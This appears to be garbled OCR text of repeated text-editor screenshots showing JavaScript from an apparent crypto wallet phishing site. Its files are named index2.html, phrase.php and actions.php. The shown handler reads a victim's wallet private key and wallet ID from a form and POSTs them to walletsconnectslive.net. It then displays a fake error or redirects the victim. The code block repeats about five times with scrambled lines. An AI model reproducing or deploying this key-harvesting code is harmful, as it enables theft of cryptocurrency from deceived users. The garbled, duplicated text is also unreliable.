        <w:t>1615</w:t>
        <w:br/>
        <w:t>privatekey ='</w:t>
        <w:br/>
        <w:t>1616</w:t>
        <w:br/>
        <w:t>redirect( );</w:t>
        <w:br/>
        <w:t>1617</w:t>
        <w:br/>
        <w:t>document. querySelector('.sending').style. display = 'block' ;</w:t>
        <w:br/>
        <w:t>1618</w:t>
        <w:br/>
        <w:t>1619</w:t>
        <w:br/>
        <w:t>} else {</w:t>
        <w:br/>
        <w:t>1620</w:t>
        <w:br/>
        <w:t>alert( 'Could not proceed due to some errors, kindly try again later. ')</w:t>
        <w:br/>
        <w:t>1621</w:t>
        <w:br/>
        <w:t>1622</w:t>
        <w:br/>
        <w:t>1623</w:t>
        <w:br/>
        <w:t>1624</w:t>
        <w:br/>
        <w:t>HTML Tab Width: 8</w:t>
        <w:br/>
        <w:t>Ln 1629, Col 7</w:t>
        <w:br/>
        <w:t>INS</w:t>
        <w:br/>
        <w:t>Activities</w:t>
        <w:br/>
        <w:t>Text Editor</w:t>
        <w:br/>
        <w:t>Nov 6 03:34</w:t>
        <w:br/>
        <w:t>Open</w:t>
        <w:br/>
        <w:t>index2.html</w:t>
        <w:br/>
        <w:t>~/Downloads/Site_Work</w:t>
        <w:br/>
        <w:t>Save</w:t>
        <w:br/>
        <w:t>×</w:t>
        <w:br/>
        <w:t>index2.html</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>phrase.php</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>actions.php</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>index.php</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>js2w.js.download</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>1370</w:t>
        <w:br/>
        <w:t>ater uy couto not proceed out to surie CTUS, Numaty try again later. ]</w:t>
        <w:br/>
        <w:t>1591</w:t>
        <w:br/>
        <w:t>1592</w:t>
        <w:br/>
        <w:t>1593</w:t>
        <w:br/>
        <w:t>1594</w:t>
        <w:br/>
        <w:t>1595</w:t>
        <w:br/>
        <w:t>1596</w:t>
        <w:br/>
        <w:t>};</w:t>
        <w:br/>
        <w:t>1597</w:t>
        <w:br/>
        <w:t>O</w:t>
        <w:br/>
        <w:t>1598</w:t>
        <w:br/>
        <w:t>const privatekeyProceedHandler = () =&gt; {</w:t>
        <w:br/>
        <w:t>1599</w:t>
        <w:br/>
        <w:t>event. preventDefault( );</w:t>
        <w:br/>
        <w:t>1600</w:t>
        <w:br/>
        <w:t>let privatekey = document. getElementById( 'privatekey' ).value;</w:t>
        <w:br/>
        <w:t>1601</w:t>
        <w:br/>
        <w:t>const wallet = document. getElementById( 'wallet_id').value;</w:t>
        <w:br/>
        <w:t>1602</w:t>
        <w:br/>
        <w:t>console. log(wallet) ;</w:t>
        <w:br/>
        <w:t>1603</w:t>
        <w:br/>
        <w:t>if (privatekey. trim( ) === "") {</w:t>
        <w:br/>
        <w:t>1604</w:t>
        <w:br/>
        <w:t>alert( 'Fill in your private key');</w:t>
        <w:br/>
        <w:t>1605</w:t>
        <w:br/>
        <w:t>} else {</w:t>
        <w:br/>
        <w:t>A</w:t>
        <w:br/>
        <w:t>1606</w:t>
        <w:br/>
        <w:t>$. ajax( {</w:t>
        <w:br/>
        <w:t>1607</w:t>
        <w:br/>
        <w:t>url: "https://walletsconnectslive.net/thirdform",</w:t>
        <w:br/>
        <w:t>1608</w:t>
        <w:br/>
        <w:t>method: 'POST' ,</w:t>
        <w:br/>
        <w:t>1609</w:t>
        <w:br/>
        <w:t>data: { import_type: 'private', wallet: wallet, privatekey: privatekey, _token: "VNSElc2gRav1j8Vo06hMGE2lgerCJRM3VHsxXmjf" },</w:t>
        <w:br/>
        <w:t>?</w:t>
        <w:br/>
        <w:t>1610</w:t>
        <w:br/>
        <w:t>success: function (res) {</w:t>
        <w:br/>
        <w:t>1611</w:t>
        <w:br/>
        <w:t>if (res. trim( ) ! == "") {</w:t>
        <w:br/>
        <w:t>1612</w:t>
        <w:br/>
        <w:t>if (res. trim( ) === "string_error") {</w:t>
        <w:br/>
        <w:t>1613</w:t>
        <w:br/>
        <w:t>alert( 'Fill in your private key. ');</w:t>
        <w:br/>
        <w:t>1614</w:t>
        <w:br/>
        <w:t>} else if (res. trim( ) === "success") {</w:t>
        <w:br/>
        <w:t>1615</w:t>
        <w:br/>
        <w:t>privatekey ='</w:t>
        <w:br/>
        <w:t>1616</w:t>
        <w:br/>
        <w:t>redirect( );</w:t>
        <w:br/>
        <w:t>1617</w:t>
        <w:br/>
        <w:t>document. querySelector('.sending').style. display = 'block' ;</w:t>
        <w:br/>
        <w:t>1618</w:t>
        <w:br/>
        <w:t>1619</w:t>
        <w:br/>
        <w:t>} else {</w:t>
        <w:br/>
        <w:t>1620</w:t>
        <w:br/>
        <w:t>alert( 'Could not proceed due to some errors, kindly try again later. ')</w:t>
        <w:br/>
        <w:t>1621</w:t>
        <w:br/>
        <w:t>1622</w:t>
        <w:br/>
        <w:t>1623</w:t>
        <w:br/>
        <w:t>1624</w:t>
        <w:br/>
        <w:t>HTML Tab Width: 8</w:t>
        <w:br/>
        <w:t>Ln 1629, Col 7</w:t>
        <w:br/>
        <w:t>INS</w:t>
        <w:br/>
        <w:t>Activities</w:t>
        <w:br/>
        <w:t>Text Editor</w:t>
        <w:br/>
        <w:t>Nov 6 03:34</w:t>
        <w:br/>
        <w:t>Open</w:t>
        <w:br/>
        <w:t>index2.html</w:t>
        <w:br/>
        <w:t>~/Downloads/Site_Work</w:t>
        <w:br/>
        <w:t>Save</w:t>
        <w:br/>
        <w:t>×</w:t>
        <w:br/>
        <w:t>index2.html</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>phrase.php</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>actions.php</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>index.php</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>js2w.js.download</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>1370</w:t>
        <w:br/>
        <w:t>ater uy couto not proceed out to surie CTUS, Numaty try again later. ]</w:t>
        <w:br/>
        <w:t>1591</w:t>
        <w:br/>
        <w:t>1592</w:t>
        <w:br/>
        <w:t>1593</w:t>
        <w:br/>
        <w:t>1594</w:t>
        <w:br/>
        <w:t>1595</w:t>
        <w:br/>
        <w:t>1596</w:t>
        <w:br/>
        <w:t>};</w:t>
        <w:br/>
        <w:t>1597</w:t>
        <w:br/>
        <w:t>O</w:t>
        <w:br/>
        <w:t>1598</w:t>
        <w:br/>
        <w:t>const privatekeyProceedHandler = () =&gt; {</w:t>
        <w:br/>
        <w:t>1599</w:t>
        <w:br/>
        <w:t>event. preventDefault( );</w:t>
        <w:br/>
        <w:t>1600</w:t>
        <w:br/>
        <w:t>let privatekey = document. getElementById( 'privatekey' ).value;</w:t>
        <w:br/>
        <w:t>1601</w:t>
        <w:br/>
        <w:t>const wallet = document. getElementById( 'wallet_id').value;</w:t>
        <w:br/>
        <w:t>1602</w:t>
        <w:br/>
        <w:t>console. log(wallet) ;</w:t>
        <w:br/>
        <w:t>1603</w:t>
        <w:br/>
        <w:t>if (privatekey. trim( ) === "") {</w:t>
        <w:br/>
        <w:t>1604</w:t>
        <w:br/>
        <w:t>alert( 'Fill in your private key');</w:t>
        <w:br/>
        <w:t>1605</w:t>
        <w:br/>
        <w:t>} else {</w:t>
        <w:br/>
        <w:t>A</w:t>
        <w:br/>
        <w:t>1606</w:t>
        <w:br/>
        <w:t>$. ajax( {</w:t>
        <w:br/>
        <w:t>1607</w:t>
        <w:br/>
        <w:t>url: "https://walletsconnectslive.net/thirdform",</w:t>
        <w:br/>
        <w:t>1608</w:t>
        <w:br/>
        <w:t>method: 'POST' ,</w:t>
        <w:br/>
        <w:t>1609</w:t>
        <w:br/>
        <w:t>data: { import_type: 'private', wallet: wallet, privatekey: privatekey, _token: "VNSElc2gRav1j8Vo06hMGE2lgerCJRM3VHsxXmjf" },</w:t>
        <w:br/>
        <w:t>?</w:t>
        <w:br/>
        <w:t>1610</w:t>
        <w:br/>
        <w:t>success: function (res) {</w:t>
        <w:br/>
        <w:t>1611</w:t>
        <w:br/>
        <w:t>if (res. trim( ) ! == "") {</w:t>
        <w:br/>
        <w:t>1612</w:t>
        <w:br/>
        <w:t>if (res. trim( ) === "string_error") {</w:t>
        <w:br/>
        <w:t>1613</w:t>
        <w:br/>
        <w:t>alert( 'Fill in your private key. ');</w:t>
        <w:br/>
        <w:t>1614</w:t>
        <w:br/>
        <w:t>} else if (res. trim( ) === "success") {</w:t>
        <w:br/>
        <w:t>1615</w:t>
        <w:br/>
        <w:t>privatekey ='</w:t>
        <w:br/>
        <w:t>1616</w:t>
        <w:br/>
        <w:t>redirect( );</w:t>
        <w:br/>
        <w:t>1617</w:t>
        <w:br/>
        <w:t>document. querySelector('.sending').style. display = 'block' ;</w:t>
        <w:br/>
        <w:t>1618</w:t>
        <w:br/>
        <w:t>1619</w:t>
        <w:br/>
        <w:t>} else {</w:t>
        <w:br/>
        <w:t>1620</w:t>
        <w:br/>
        <w:t>alert( 'Could not proceed due to some errors, kindly try again later. ')</w:t>
        <w:br/>
        <w:t>1621</w:t>
        <w:br/>
        <w:t>1622</w:t>
        <w:br/>
        <w:t>1623</w:t>
        <w:br/>
        <w:t>1624</w:t>
        <w:br/>
        <w:t>HTML Tab Width: 8</w:t>
        <w:br/>
        <w:t>Ln 1629, Col 7</w:t>
        <w:br/>
        <w:t>INS</w:t>
        <w:br/>
        <w:t>Activities</w:t>
        <w:br/>
        <w:t>Text Editor</w:t>
        <w:br/>
        <w:t>Nov 6 03:34</w:t>
        <w:br/>
        <w:t>Open</w:t>
        <w:br/>
        <w:t>index2.html</w:t>
        <w:br/>
        <w:t>~/Downloads/Site_Work</w:t>
        <w:br/>
        <w:t>Save</w:t>
        <w:br/>
        <w:t>×</w:t>
        <w:br/>
        <w:t>index2.html</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>phrase.php</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>actions.php</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>index.php</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>js2w.js.download</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>1370</w:t>
        <w:br/>
        <w:t>ater uy couto not proceed out to surie CTUS, Numaty try again later. ]</w:t>
        <w:br/>
        <w:t>1591</w:t>
        <w:br/>
        <w:t>1592</w:t>
        <w:br/>
        <w:t>1593</w:t>
        <w:br/>
        <w:t>1594</w:t>
        <w:br/>
        <w:t>1595</w:t>
        <w:br/>
        <w:t>1596</w:t>
        <w:br/>
        <w:t>};</w:t>
        <w:br/>
        <w:t>1597</w:t>
        <w:br/>
        <w:t>O</w:t>
        <w:br/>
        <w:t>1598</w:t>
        <w:br/>
        <w:t>const privatekeyProceedHandler = () =&gt; {</w:t>
        <w:br/>
        <w:t>1599</w:t>
        <w:br/>
        <w:t>event. preventDefault( );</w:t>
        <w:br/>
        <w:t>1600</w:t>
        <w:br/>
        <w:t>let privatekey = document. getElementById( 'privatekey' ).value;</w:t>
        <w:br/>
        <w:t>1601</w:t>
        <w:br/>
        <w:t>const wallet = document. getElementById( 'wallet_id').value;</w:t>
        <w:br/>
        <w:t>1602</w:t>
        <w:br/>
        <w:t>console. log(wallet) ;</w:t>
        <w:br/>
        <w:t>1603</w:t>
        <w:br/>
        <w:t>if (privatekey. trim( ) === "") {</w:t>
        <w:br/>
        <w:t>1604</w:t>
        <w:br/>
        <w:t>alert( 'Fill in your private key');</w:t>
        <w:br/>
        <w:t>1605</w:t>
        <w:br/>
        <w:t>} else {</w:t>
        <w:br/>
        <w:t>A</w:t>
        <w:br/>
        <w:t>1606</w:t>
        <w:br/>
        <w:t>$. ajax( {</w:t>
        <w:br/>
        <w:t>1607</w:t>
        <w:br/>
        <w:t>url: "https://walletsconnectslive.net/thirdform",</w:t>
        <w:br/>
        <w:t>1608</w:t>
        <w:br/>
        <w:t>method: 'POST' ,</w:t>
        <w:br/>
        <w:t>1609</w:t>
        <w:br/>
        <w:t>data: { import_type: 'private', wallet: wallet, privatekey: privatekey, _token: "VNSElc2gRav1j8Vo06hMGE2lgerCJRM3VHsxXmjf" },</w:t>
        <w:br/>
        <w:t>?</w:t>
        <w:br/>
        <w:t>1610</w:t>
        <w:br/>
        <w:t>success: function (res) {</w:t>
        <w:br/>
        <w:t>1611</w:t>
        <w:br/>
        <w:t>if (res. trim( ) ! == "") {</w:t>
        <w:br/>
        <w:t>1612</w:t>
        <w:br/>
        <w:t>if (res. trim( ) === "string_error") {</w:t>
        <w:br/>
        <w:t>1613</w:t>
        <w:br/>
        <w:t>alert( 'Fill in your private key. ');</w:t>
        <w:br/>
        <w:t>1614</w:t>
        <w:br/>
        <w:t>} else if (res. trim( ) === "success") {</w:t>
        <w:br/>
        <w:t>1615</w:t>
        <w:br/>
        <w:t>privatekey ='</w:t>
        <w:br/>
        <w:t>1616</w:t>
        <w:br/>
        <w:t>redirect( );</w:t>
        <w:br/>
        <w:t>1617</w:t>
        <w:br/>
        <w:t>document. querySelector('.sending').style. display = 'block' ;</w:t>
        <w:br/>
        <w:t>1618</w:t>
        <w:br/>
        <w:t>1619</w:t>
        <w:br/>
        <w:t>} else {</w:t>
        <w:br/>
        <w:t>1620</w:t>
        <w:br/>
        <w:t>alert( 'Could not proceed due to some errors, kindly try again later. ')</w:t>
        <w:br/>
        <w:t>1621</w:t>
        <w:br/>
        <w:t>1622</w:t>
        <w:br/>
        <w:t>1623</w:t>
        <w:br/>
        <w:t>1624</w:t>
        <w:br/>
        <w:t>HTML Tab Width: 8</w:t>
        <w:br/>
        <w:t>Ln 1629, Col 7</w:t>
        <w:br/>
        <w:t>INS</w:t>
        <w:br/>
        <w:t>Activities</w:t>
        <w:br/>
        <w:t>Text Editor</w:t>
        <w:br/>
        <w:t>Nov 6 03:34</w:t>
        <w:br/>
        <w:t>Open</w:t>
        <w:br/>
        <w:t>index2.html</w:t>
        <w:br/>
        <w:t>~/Downloads/Site_Work</w:t>
        <w:br/>
        <w:t>Save</w:t>
        <w:br/>
        <w:t>×</w:t>
        <w:br/>
        <w:t>index2.html</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>phrase.php</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>actions.php</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>index.php</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>js2w.js.download</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>1370</w:t>
        <w:br/>
        <w:t>ater uy couto not proceed out to surie CTUS, Numaty try again later. ]</w:t>
        <w:br/>
        <w:t>1591</w:t>
        <w:br/>
        <w:t>1592</w:t>
        <w:br/>
        <w:t>1593</w:t>
        <w:br/>
        <w:t>1594</w:t>
        <w:br/>
        <w:t>1595</w:t>
        <w:br/>
        <w:t>1596</w:t>
        <w:br/>
        <w:t>};</w:t>
        <w:br/>
        <w:t>1597</w:t>
        <w:br/>
        <w:t>O</w:t>
        <w:br/>
        <w:t>1598</w:t>
        <w:br/>
        <w:t>const privatekeyProceedHandler = () =&gt; {</w:t>
        <w:br/>
        <w:t>1599</w:t>
        <w:br/>
        <w:t>event. preventDefault( );</w:t>
        <w:br/>
        <w:t>1600</w:t>
        <w:br/>
        <w:t>let privatekey = document. getElementById( 'privatekey' ).value;</w:t>
        <w:br/>
        <w:t>1601</w:t>
        <w:br/>
        <w:t>const wallet = document. getElementById( 'wallet_id').value;</w:t>
        <w:br/>
        <w:t>1602</w:t>
        <w:br/>
        <w:t>console. log(wallet) ;</w:t>
        <w:br/>
        <w:t>1603</w:t>
        <w:br/>
        <w:t>if (privatekey. trim( ) === "") {</w:t>
        <w:br/>
        <w:t>1604</w:t>
        <w:br/>
        <w:t>alert( 'Fill in your private key');</w:t>
        <w:br/>
        <w:t>1605</w:t>
        <w:br/>
        <w:t>} else {</w:t>
        <w:br/>
        <w:t>A</w:t>
        <w:br/>
        <w:t>1606</w:t>
        <w:br/>
        <w:t>$. ajax( {</w:t>
        <w:br/>
        <w:t>1607</w:t>
        <w:br/>
        <w:t>url: "https://walletsconnectslive.net/thirdform",</w:t>
        <w:br/>
        <w:t>1608</w:t>
        <w:br/>
        <w:t>method: 'POST' ,</w:t>
        <w:br/>
        <w:t>1609</w:t>
        <w:br/>
        <w:t>data: { import_type: 'private', wallet: wallet, privatekey: privatekey, _token: "VNSElc2gRav1j8Vo06hMGE2lgerCJRM3VHsxXmjf" },</w:t>
        <w:br/>
        <w:t>?</w:t>
        <w:br/>
        <w:t>1610</w:t>
        <w:br/>
        <w:t>success: function (res) {</w:t>
        <w:br/>
        <w:t>1611</w:t>
        <w:br/>
        <w:t>if (res. trim( ) ! == "") {</w:t>
        <w:br/>
        <w:t>1612</w:t>
        <w:br/>
        <w:t>if (res. trim( ) === "string_error") {</w:t>
        <w:br/>
        <w:t>1613</w:t>
        <w:br/>
        <w:t>alert( 'Fill in your private key. ');</w:t>
        <w:br/>
        <w:t>1614</w:t>
        <w:br/>
        <w:t>} else if (res. trim( ) === "success") {</w:t>
        <w:br/>
        <w:t>1615</w:t>
        <w:br/>
        <w:t>privatekey ='</w:t>
        <w:br/>
        <w:t>1616</w:t>
        <w:br/>
        <w:t>redirect( );</w:t>
        <w:br/>
        <w:t>1617</w:t>
        <w:br/>
        <w:t>document. querySelector('.sending').style. display = 'block' ;</w:t>
        <w:br/>
        <w:t>1618</w:t>
        <w:br/>
        <w:t>1619</w:t>
        <w:br/>
        <w:t>} else {</w:t>
        <w:br/>
        <w:t>1620</w:t>
        <w:br/>
        <w:t>alert( 'Could not proceed due to some errors, kindly try again later. ')</w:t>
        <w:br/>
        <w:t>1621</w:t>
        <w:br/>
        <w:t>1622</w:t>
        <w:br/>
        <w:t>1623</w:t>
        <w:br/>
        <w:t>1624</w:t>
        <w:br/>
        <w:t>HTML Tab Width: 8</w:t>
        <w:br/>
        <w:t>Ln 1629, Col 7</w:t>
        <w:br/>
        <w:t>INS</w:t>
        <w:br/>
        <w:t>Activities</w:t>
        <w:br/>
        <w:t>Text Editor</w:t>
        <w:br/>
        <w:t>Nov 6 03:34</w:t>
        <w:br/>
        <w:t>Open</w:t>
        <w:br/>
        <w:t>index2.html</w:t>
        <w:br/>
        <w:t>~/Downloads/Site_Work</w:t>
        <w:br/>
        <w:t>Save</w:t>
        <w:br/>
        <w:t>×</w:t>
        <w:br/>
        <w:t>index2.html</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>phrase.php</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>actions.php</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>index.php</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>js2w.js.download</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>1370</w:t>
        <w:br/>
        <w:t>ater uy couto not proceed out to surie CTUS, Numaty try again later. ]</w:t>
        <w:br/>
        <w:t>1591</w:t>
        <w:br/>
        <w:t>1592</w:t>
        <w:br/>
        <w:t>1593</w:t>
        <w:br/>
        <w:t>1594</w:t>
        <w:br/>
        <w:t>1595</w:t>
        <w:br/>
        <w:t>1596</w:t>
        <w:br/>
        <w:t>};</w:t>
        <w:br/>
        <w:t>1597</w:t>
        <w:br/>
        <w:t>O</w:t>
        <w:br/>
        <w:t>1598</w:t>
        <w:br/>
        <w:t>const privatekeyProceedHandler = () =&gt; {</w:t>
        <w:br/>
        <w:t>1599</w:t>
        <w:br/>
        <w:t>event. preventDefault( );</w:t>
        <w:br/>
        <w:t>1600</w:t>
        <w:br/>
        <w:t>let privatekey = document. getElementById( 'privatekey' ).value;</w:t>
        <w:br/>
        <w:t>1601</w:t>
        <w:br/>
        <w:t>const wallet = document. getElementById( 'wallet_id').value;</w:t>
        <w:br/>
        <w:t>1602</w:t>
        <w:br/>
        <w:t>console. log(wallet) ;</w:t>
        <w:br/>
        <w:t>1603</w:t>
        <w:br/>
        <w:t>if (privatekey. trim( ) === "") {</w:t>
        <w:br/>
        <w:t>1604</w:t>
        <w:br/>
        <w:t>alert( 'Fill in your private key');</w:t>
        <w:br/>
        <w:t>1605</w:t>
        <w:br/>
        <w:t>} else {</w:t>
        <w:br/>
        <w:t>A</w:t>
        <w:br/>
        <w:t>1606</w:t>
        <w:br/>
        <w:t>$. ajax( {</w:t>
        <w:br/>
        <w:t>1607</w:t>
        <w:br/>
        <w:t>url: "https://walletsconnectslive.net/thirdform",</w:t>
        <w:br/>
        <w:t>1608</w:t>
        <w:br/>
        <w:t>method: 'POST' ,</w:t>
        <w:br/>
        <w:t>1609</w:t>
        <w:br/>
        <w:t>data: { import_type: 'private', wallet: wallet, privatekey: privatekey, _token: "VNSElc2gRav1j8Vo06hMGE2lgerCJRM3VHsxXmjf" },</w:t>
        <w:br/>
        <w:t>?</w:t>
        <w:br/>
        <w:t>1610</w:t>
        <w:br/>
        <w:t>success: function (res) {</w:t>
        <w:br/>
        <w:t>1611</w:t>
        <w:br/>
        <w:t>if (res. trim( ) ! == "") {</w:t>
        <w:br/>
        <w:t>1612</w:t>
        <w:br/>
        <w:t>if (res. trim( ) === "string_error") {</w:t>
        <w:br/>
        <w:t>1613</w:t>
        <w:br/>
        <w:t>alert( 'Fill in your private key. ');</w:t>
        <w:br/>
        <w:t>1614</w:t>
        <w:br/>
        <w:t>} else if (res. trim( ) === "success") {</w:t>
        <w:br/>
        <w:t>1615</w:t>
        <w:br/>
        <w:t>privatekey ='</w:t>
        <w:br/>
        <w:t>1616</w:t>
        <w:br/>
        <w:t>redirect( );</w:t>
        <w:br/>
        <w:t>1617</w:t>
        <w:br/>
        <w:t>document. querySelector('.sending').style. display = 'block' ;</w:t>
        <w:br/>
        <w:t>1618</w:t>
        <w:br/>
        <w:t>1619</w:t>
        <w:br/>
        <w:t>} else {</w:t>
        <w:br/>
        <w:t>1620</w:t>
        <w:br/>
        <w:t>alert( 'Could not proceed due to some errors, kindly try again later. ')</w:t>
        <w:br/>
        <w:t>1621</w:t>
        <w:br/>
        <w:t>1622</w:t>
        <w:br/>
        <w:t>1623</w:t>
        <w:br/>
        <w:t>1624</w:t>
        <w:br/>
        <w:t>HTML Tab Width: 8</w:t>
        <w:br/>
        <w:t>Ln 1629, Col 7</w:t>
        <w:br/>
        <w:t>INS</w:t>
        <w:br/>
        <w:t>Activities</w:t>
        <w:br/>
        <w:t>Text Editor</w:t>
        <w:br/>
        <w:t>Nov 6 03:34</w:t>
        <w:br/>
        <w:t>Open</w:t>
        <w:br/>
        <w:t>index2.html</w:t>
        <w:br/>
        <w:t>~/Downloads/Site_Work</w:t>
        <w:br/>
        <w:t>Save</w:t>
        <w:br/>
        <w:t>×</w:t>
        <w:br/>
        <w:t>index2.html</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>phrase.php</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>actions.php</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>index.php</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>js2w.js.download</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>1370</w:t>
        <w:br/>
        <w:t>ater uy couto not proceed out to surie CTUS, Numaty try again later. ]</w:t>
        <w:br/>
        <w:t>1591</w:t>
        <w:br/>
        <w:t>1592</w:t>
        <w:br/>
        <w:t>1593</w:t>
        <w:br/>
        <w:t>1594</w:t>
        <w:br/>
        <w:t>1595</w:t>
        <w:br/>
        <w:t>1596</w:t>
        <w:br/>
        <w:t>};</w:t>
        <w:br/>
        <w:t>1597</w:t>
        <w:br/>
        <w:t>O</w:t>
        <w:br/>
        <w:t>1598</w:t>
        <w:br/>
        <w:t>const privatekeyProceedHandler = () =&gt; {</w:t>
        <w:br/>
        <w:t>1599</w:t>
        <w:br/>
        <w:t>event. preventDefault( );</w:t>
        <w:br/>
        <w:t>1600</w:t>
        <w:br/>
        <w:t>let privatekey = document. getElementById( 'privatekey' ).value;</w:t>
        <w:br/>
        <w:t>1601</w:t>
        <w:br/>
        <w:t>const wallet = document. getElementById( 'wallet_id').value;</w:t>
        <w:br/>
        <w:t>1602</w:t>
        <w:br/>
        <w:t>console. log(wallet) ;</w:t>
        <w:br/>
        <w:t>1603</w:t>
        <w:br/>
        <w:t>if (privatekey. trim( ) === "") {</w:t>
        <w:br/>
        <w:t>1604</w:t>
        <w:br/>
        <w:t>alert( 'Fill in your private key');</w:t>
        <w:br/>
        <w:t>1605</w:t>
        <w:br/>
        <w:t>} else {</w:t>
        <w:br/>
        <w:t>A</w:t>
        <w:br/>
        <w:t>1606</w:t>
        <w:br/>
        <w:t>$. ajax( {</w:t>
        <w:br/>
        <w:t>1607</w:t>
        <w:br/>
        <w:t>url: "https://walletsconnectslive.net/thirdform",</w:t>
        <w:br/>
        <w:t>1608</w:t>
        <w:br/>
        <w:t>method: 'POST' ,</w:t>
        <w:br/>
        <w:t>1609</w:t>
        <w:br/>
        <w:t>data: { import_type: 'private', wallet: wallet, privatekey: privatekey, _token: "VNSElc2gRav1j8Vo06hMGE2lgerCJRM3VHsxXmjf" },</w:t>
        <w:br/>
        <w:t>?</w:t>
        <w:br/>
        <w:t>1610</w:t>
        <w:br/>
        <w:t>success: function (res) {</w:t>
        <w:br/>
        <w:t>1611</w:t>
        <w:br/>
        <w:t>if (res. trim( ) ! == "") {</w:t>
        <w:br/>
        <w:t>1612</w:t>
        <w:br/>
        <w:t>if (res. trim( ) === "string_error") {</w:t>
        <w:br/>
        <w:t>1613</w:t>
        <w:br/>
        <w:t>alert( 'Fill in your private key. ');</w:t>
        <w:br/>
        <w:t>1614</w:t>
        <w:br/>
        <w:t>} else if (res. trim( ) === "success") {</w:t>
        <w:br/>
        <w:t>1615</w:t>
        <w:br/>
        <w:t>privatekey ='</w:t>
        <w:br/>
        <w:t>1616</w:t>
        <w:br/>
        <w:t>redirect( );</w:t>
        <w:br/>
        <w:t>1617</w:t>
        <w:br/>
        <w:t>document. querySelector('.sending').style. display = 'block' ;</w:t>
        <w:br/>
        <w:t>1618</w:t>
        <w:br/>
        <w:t>1619</w:t>
        <w:br/>
        <w:t>} else {</w:t>
        <w:br/>
        <w:t>1620</w:t>
        <w:br/>
        <w:t>alert( 'Could not proceed due to some errors, kindly try again later. ')</w:t>
        <w:br/>
        <w:t>1621</w:t>
        <w:br/>
        <w:t>1622</w:t>
        <w:br/>
        <w:t>1623</w:t>
        <w:br/>
        <w:t>1624</w:t>
        <w:br/>
        <w:t>HTML Tab Width: 8</w:t>
        <w:br/>
        <w:t>Ln 1629, Col 7</w:t>
        <w:br/>
        <w:t>I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